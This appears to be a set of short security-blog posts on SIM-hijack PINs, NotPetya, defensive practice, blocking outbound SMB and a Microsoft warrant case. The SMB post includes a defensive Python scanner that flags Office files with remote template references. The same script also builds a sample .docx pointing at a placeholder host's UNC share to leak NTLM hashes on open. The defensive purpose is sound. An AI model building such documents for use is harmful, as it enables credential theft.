Port Validation Passcode or Prevent SIM hijacking

Do you have a port validation passcode set up on your mobile/wireless account? If not, it is something you may want to consider: without one, anyone who can talk a carrier rep into it can port your number to another SIM and receive your SMS-based two-factor codes.

Does AT&T support such a feature?

To reduce the risk of this happening to you if you’re a T-Mobile customer, call 611 from your cellphone or 1-800-937-8997 and tell a support staffer that you want to create a “port validation” passcode. This is also called a phone passcode or PIN, depending on your provider (most US providers offer this feature now). Motherboard confirmed that Sprint, T-Mobile, Verizon and U.S. Cellular all give customers this option. 

NotPetya: Russian military or NSA ?

There’s a new WaPo article describing how Russian military hackers were behind the NotPetya malware, which targeted Ukraine but also hit global companies, putting lost revenue for US companies alone in the high hundreds of millions of dollars.

Considering NotPetya spread using the EternalBlue exploit, which had been hoarded by a US three-letter agency until it leaked, are the Russians really to blame? (Worth keeping in mind: Microsoft had patched the underlying SMBv1 flaw in MS17-010 three months before NotPetya hit, and NotPetya also spread with harvested credentials over PsExec and WMI, so EternalBlue was only one of its paths.) Hopefully the updated Vulnerabilities Equities Process (VEP) will prevent future vulnerabilities discovered by US intelligence agencies from being used against us.

gadgets vs. process innovations

In the 1980s, defenders had to invent computer emergency response teams. In the 1990s, it was an innovation to have a chief information security officer to centralize authority or build an information sharing and analysis center to share and collaborate with peers. In the 2010s, the idea of a cyber kill chain changed how defenders conceptualize their job. Further improving operational coordination―through response playbooks, frequent exercises, and groups like information sharing and analysis organizations―can be an inexpensive way to build significant capability. Such revolutionary innovations have a very modest cost yet are often overlooked in favor of the newest technological gadgets.

from: Building a Defensible Cyberspace

APT Tracker

There are a lot of different campaign and actor names, and it’s tough to keep them all straight — just see here.

The Council on Foreign Relations released a new tool, the Cyber Operations Tracker.  The tool is a database of the publicly known state-sponsored cyber incidents that have occurred since 2005.  The database contains almost two hundred entries of state-sponsored cyber incidents or threat actors for which data is publicly available. Want to know who is spying on whom? Looking for the number of times North Korea has been publicly denounced for its cyber operations? Heard of Equation Group but would like to know more about it? The tracker can help answer all of these questions.

I should also mention that Google and Arbor Networks partnered up a while ago to create the Digital Attack Map; however, its focus is on DDoS attacks.


Disable 445 outbound

Just a friendly reminder to make sure you’re only allowing the outbound ports you actually need (typically TCP 80 and 443, maybe 8080, ideally through a proxy) from your network. According to this recent US-CERT alert, advanced attackers are using email attachments that leverage legitimate Microsoft Office functions to retrieve a document from a remote server using the Server Message Block (SMB) protocol. This sends the user’s credential hash to the remote server prior to retrieving the requested file. (Note: it is not necessary for the file to be retrieved for the transfer of credentials to occur.) The threat actors then likely used password-cracking techniques to obtain the plaintext password. What actually leaves the network is an NTLM challenge-response (Net-NTLMv2), which can be cracked offline or relayed to another service that accepts NTLM, so no user interaction beyond opening the document is needed.

TCP ports 445 and 139 and UDP ports 137 and 138 (SMB and NetBIOS) should only be allowed internally, never outbound to the Internet!!! One caveat: if the WebClient service is running, Windows will retry a failed UNC fetch over WebDAV on TCP 80/443, so pair the egress filter with either disabling WebClient or the “Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers” policy so NTLM is not sent to hosts outside your domain.
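As an added example (not code from the US-CERT alert or from this post), here is a small Python scanner for the document-side half of the trick above. It assumes the mechanism is the one commonly seen: an OOXML package whose relationship parts (for instance an attachedTemplate entry in word/_rels/settings.xml.rels) point at an external UNC path, file:// URL or web URL, which Word fetches, and authenticates to, when the file is opened. The sample .docx it builds in memory is constructed for this demonstration, and the 203.0.113.5 host is a documentation-range placeholder.

```python
"""Flag Office (OOXML) files whose relationship parts reference a remote
resource. A settings.xml.rels entry of type attachedTemplate with an
external UNC or file:// target makes Word fetch it on open over SMB and
send the user's NTLM challenge-response. Added example, not alert code."""
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
TEMPLATE_REL = OFFICE_REL + "/attachedTemplate"


def classify_target(target):
    """Return how a relationship target would be fetched, or None if local."""
    t = target.strip()
    low = t.lower()
    if t.startswith("\\\\") or low.startswith("file:"):
        return "unc"          # SMB (TCP 445/139) with NTLM authentication
    if low.startswith("http://") or low.startswith("https://"):
        return "http"         # WebDAV/HTTP; can still leak NTLM
    return None               # relative part inside the package


def external_references(data):
    """Scan every .rels part of an OOXML package for external targets."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as pkg:
        for name in sorted(pkg.namelist()):
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(pkg.read(name))
            for rel in root.iter("{%s}Relationship" % REL_NS):
                if rel.get("TargetMode") != "External":
                    continue
                kind = classify_target(rel.get("Target", ""))
                if kind is None:
                    continue
                findings.append({
                    "part": name,
                    "rel_type": rel.get("Type", "").rsplit("/", 1)[-1],
                    "target": rel.get("Target"),
                    "kind": kind,
                })
    return findings


def build_sample_docx(template_target=None):
    """Build a minimal .docx in memory (constructed for this example).
    With template_target set, settings.xml.rels points Word at a remote
    template, the way the malicious attachments described above do."""
    rels = ['<Relationships xmlns="%s">' % REL_NS,
            '<Relationship Id="rId1" Type="%s/styles" Target="styles.xml"/>'
            % OFFICE_REL]
    if template_target is not None:
        rels.append('<Relationship Id="rId2" Type="%s" Target="%s" '
                    'TargetMode="External"/>' % (TEMPLATE_REL, template_target))
    rels.append("</Relationships>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as pkg:
        pkg.writestr("[Content_Types].xml",
                     '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        pkg.writestr("word/document.xml",
                     '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        pkg.writestr("word/settings.xml",
                     '<w:settings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        pkg.writestr("word/_rels/settings.xml.rels", "".join(rels))
    return buf.getvalue()


if __name__ == "__main__":
    # Placeholder attacker host; 203.0.113.5 is a documentation address.
    bad = build_sample_docx(r"\\203.0.113.5\share\invoice.dotm")
    for f in external_references(bad):
        print("%s: %s -> %s (%s)" % (f["part"], f["rel_type"], f["target"], f["kind"]))
    print("clean doc findings:", external_references(build_sample_docx()))
```

Run it against a real attachment with `external_references(open(path, "rb").read())`; anything classified "unc" is a credential leak waiting for a click, and "http" targets deserve a look too because of the WebDAV fallback mentioned above.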


SpamGourmet & Fiddler

If you don’t use SpamGourmet or a similar service, I highly recommend them. They let you create unlimited e-mail forwarding addresses on the fly, so you can easily detect which websites are giving out your information. Definitely get an account if you don’t already have such a tactic!

Fiddler, a great Windows (web) proxy, gave out my e-mail address. I’m sure it was in their terms of service that I didn’t bother reading. Still disappointing.

United States v. Microsoft Primer

There’s a great summary of the government’s case against Microsoft over whether a US warrant can reach data (email) residing in an overseas data center controlled by a US company. The crux of the dispute is the territorial reach (and territorial applicability) of the Stored Communications Act (SCA), a subset of the Electronic Communications Privacy Act (ECPA) that governs law enforcement access to communications data.

The dispute arose when the Justice Department brought a warrant to Microsoft – issued based upon probable cause under the SCA (18 U.S.C. § 2703) – asking for the details and contents of an email account believed to be associated with a suspected drug trafficker.

Microsoft produced the transactional records it held on its data centers in the United States, but declined to produce the customer’s emails that it said were stored on a data center in Ireland.

HT: https://lawfareblog.com/primer-microsoft-ireland-supreme-courts-extraterritorial-warrant-case